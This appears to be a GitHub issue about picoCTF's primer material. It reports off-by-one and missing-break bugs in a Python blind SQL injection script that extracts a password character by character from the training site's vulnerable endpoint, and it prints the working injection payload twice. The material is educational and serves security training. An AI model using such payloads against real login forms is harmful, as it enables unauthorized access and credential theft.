Open
Description
The blind SQL injection code
import requests
from string import printable
accum = ""
for i in range(40):
for letter in printable:
accum += letter
r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
+ letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
if 'NOTHING FOUND...' in r.text:
accum = accum[:-1]
print("nope")
else:
print(f"We found the character: {letter}")
print(accum)loop using range(40). This iterator starts at 0 instead of 1. This causes one extra loop in the problem.
Also in the else block of the if 'NOTHING FOUND...' in r.text: their is no break causing the substr to be called on the value
of the position we already know.
To illustrate this:
If we ran this code
from string import printable
import requests
accum = ""
for i in range(40):
for letter in printable:
accum += letter
r = requests.post(
"https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
+ letter
+ "'=( select substr(binary password,"
+ str(i)
+ ",1) from pico_blind_injection where id=1 ) and ''= '"
)
if "NOTHING FOUND..." in r.text:
accum = accum[:-1]
print(f"nope: {letter} i:{i}")
else:
print(f"We found the character: {letter}")
print(accum)Which just adds letters variable to the nope we are printing. The result is:
The next problem is that after letter is found the value of substr isn't updated
The solve would be to range(1, 40) and to add a break after the else block ends.
Metadata
Assignees
Labels
No labels